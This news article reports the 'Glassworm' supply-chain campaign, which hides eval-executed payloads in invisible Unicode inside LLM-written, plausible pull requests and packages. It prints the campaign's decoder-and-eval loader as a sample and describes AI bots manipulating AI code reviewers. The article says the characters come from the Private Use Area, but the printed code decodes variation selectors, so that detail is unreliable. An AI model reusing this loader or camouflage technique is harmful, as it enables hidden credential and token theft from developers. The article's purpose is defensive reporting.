- What: A massive supply-chain attack using invisible Unicode characters to hide malicious payloads within legitimate-looking code.
- Scale: At least 151 malicious packages discovered across GitHub, NPM, and the Open VSX (VS Code) marketplace.
- Method: Attackers utilize Large Language Models (LLMs) to generate convincing, project-specific code changes that camouflage invisible executable scripts.
- Risk: Capable of stealing credentials, tokens, and secrets, often using Solana as a delivery channel for second-stage payloads.
In a sophisticated escalation of software supply-chain warfare, security researchers have uncovered an AI-driven campaign that leverages "invisible" code to bypass human review and traditional security scanners. The attack group, dubbed "Glassworm," successfully flooded GitHub and other major repositories with at least 151 malicious packages between March 3 and March 9, 2026, using Large Language Models (LLMs) to mask their activity behind perfectly formatted, benign-looking contributions.
The "Glassworm" Tactic: Hiding in Plain Sight
According to a report from security firm Aikido Security, the Glassworm group is utilizing a technique that renders malicious code completely invisible to the human eye while remaining fully executable by computers. The attack exploits Unicode "Public Use Areas" (PUA)—ranges in the Unicode specification intended for private symbols like emojis or flags.
When these characters are viewed in virtually any modern code editor, terminal, or web interface, they appear as whitespace or empty lines. However, to a JavaScript interpreter, these code points translate into executable instructions.
"The malicious injections don’t arrive in obviously suspicious commits," Aikido researchers noted. Instead, they are wrapped in "documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project." This high degree of contextual relevance is what led researchers to conclude that the attackers are likely using LLMs to generate the code at a scale that would be impossible for human hackers to maintain manually.
Technical Execution and the Role of AI
The scale of the campaign is unprecedented for this level of bespoke customization. Fellow security firm Koi, which has also been monitoring Glassworm, confirmed suspicions that AI is the primary engine behind the campaign. By feeding an LLM the existing codebase of a target repository, the attackers can generate "benign" pull requests that look like legitimate maintenance.
Hidden within these requests is a small, visible decoder function designed to extract the invisible bytes. Aikido shared a sample of the malicious logic:
const s = v => [...v].map( w => ( w = w.codePointAt( 0 ), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter( n => n !== null );
eval (Buffer.from(s( `` )).toString( 'utf-8' ));
In the example above, the backtick string passed to the function s() appears empty to a human reviewer, but it is actually packed with invisible Unicode characters. Once decoded and passed to the eval() function, the script executes a malicious payload. In previous iterations of the attack, this payload has been used to fetch second-stage scripts via Solana to exfiltrate environment variables, system information, and GitHub Personal Access Tokens (PATs).
A Growing Industry Threat
While supply-chain attacks have been a staple of cybercrime for nearly a decade, the integration of AI and invisible Unicode represents a paradigm shift. This technique was first observed in 2024 as a method for "jailbreaking" LLM prompts by feeding them instructions that human moderators could not see. Now, that same technology has been weaponized for traditional malware distribution.
The campaign has not been limited to GitHub. Researchers found similar malicious packages on NPM and the VS Code marketplace (Open VSX). Because many of these packages were deleted shortly after being uploaded, researchers believe the 151 detected packages are likely only a small fraction of a much larger, global campaign.
The impact extends beyond individual developers. Security firm Wiz recently reported on similar "s1ngularity" attacks where AI tools were used for reconnaissance within victim accounts to exfiltrate secrets. Similarly, StepSecurity recently warned of AI bots posing as "security researchers" to manipulate AI-powered code reviewers into committing malicious code in repositories owned by Microsoft and DataDog.
Impact on the Development Lifecycle
For developers and organizations, the Glassworm attack changes the fundamental assumptions of code security. Traditional manual code reviews—long considered the gold standard for catching malicious "typosquatting" or suspicious logic—are effectively neutralized by this technique.
"This is a wake-up call for the industry; manual code reviews and traditional defenses are being rendered nearly useless by a threat that literally cannot be seen," said one security analyst regarding the findings.
The immediate impact includes:
- Reviewer Fatigue: Developers must now be wary of even the most mundane "documentation" updates.
- Tooling Obsolescence: Static analysis tools that do not specifically scan for PUA Unicode characters will fail to flag these payloads.
- Trust Erosion: The ability of AI to mimic a project's "style" makes it difficult to distinguish between a helpful community contributor and a malicious bot.
What’s Next: The AI Arms Race
As AI-powered attacks become the new baseline, the industry is racing to develop "AI-aware" security tools. While some AI engines have implemented guardrails to restrict the use of invisible Unicode characters, these defenses are periodically overridden by sophisticated attackers.
Researchers recommend that developers transition to using security tools that explicitly flag non-printable Unicode characters in source code. Furthermore, organizations are being urged to adopt stricter dependency management policies, such as pinning versions and scrutinizing any new package—no matter how legitimate its "visible" code may appear.
The Glassworm campaign suggests that the future of cyber defense will not just be about finding bugs, but about detecting the subtle "hallucinations" and hidden layers of AI-generated deception.

